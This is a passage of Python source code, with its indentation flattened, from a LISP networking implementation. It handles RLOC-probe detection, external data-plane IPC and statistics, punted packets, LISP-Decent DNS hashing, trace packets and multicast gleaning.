# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (addr in lisp_rloc_probe_list): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in list(lisp_nat_state_info.values()):
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9:10])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8:9])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if ("entries" not in msg):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if ("eid-prefix" not in msg):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if ("instance-id" not in msg):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if ("rlocs" not in msg):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if ("rloc" not in ipc_rloc): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ("packet-count" not in ipc_rloc) else \
ipc_rloc["packet-count"]
bc = 0 if ("byte-count" not in ipc_rloc) else \
ipc_rloc["byte-count"]
ts = 0 if ("seconds-last-packet" not in ipc_rloc) else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
# Variable "msg" is a string and not a byte string. Caller converts.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if (key_name not in msg) else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if ("type" not in msg):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if ("interface" not in msg):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if ("source-eid" in msg):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if ("dest-eid" in msg):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or lisp_mr_or_pubsub(mc.action)):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
pubsub = (mc and mc.action == LISP_SEND_PUBSUB_ACTION)
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None, pubsub)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (eid_str in db.dynamic_eids):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value. We
# do a sha256() over a string representation of "[<iid>]<eid>", take the
# high-order 6 bytes from the hash and do the modulus on that value.
#
# The seed/password for the sha256 hash is string "".
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hmac.new(b"lisp-decent", eid_str, hashlib.sha256).hexdigest()
#
# Get hash-length to modulate from LISP_DECENT_HASH_WIDTH in bytes.
#
hash_width = os.getenv("LISP_DECENT_HASH_WIDTH")
if (hash_width in ["", None]):
hash_width = 12
else:
hash_width = int(hash_width)
if (hash_width > 32):
hash_width = 12
else:
hash_width *= 2
#endif
#endif
mod_value = hash_value[0:hash_width]
index = int(mod_value, 16) % lisp_decent_modulus
lprint("LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}". \
format(lisp_decent_modulus, old_div(hash_width, 2) , mod_value, index))
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["n"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["sr"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["n"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["sr"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed[0] + "ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["n"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["dr"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["dr"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["lats"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["se"] = seid
rec["de"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["de"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["n"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["se"] = deid
rec["de"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["sr"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["n"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
# Clear the DF-bit because we may have to fragment as the packet is going
# to grow with trace data.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
# df_flags = struct.unpack("B", headers[6:7])[0] & 0xbf
# headers = headers[0:6] + struct.pack("B", df_flags) + headers[7::]
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if ("instance-id" in entry):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if ("eid-prefix" in entry):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if ("group-prefix" in entry):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if ("rloc-prefix" in entry):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (seid_str in lisp_gleaned_groups):
if (group_str in lisp_gleaned_groups[seid_str]):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
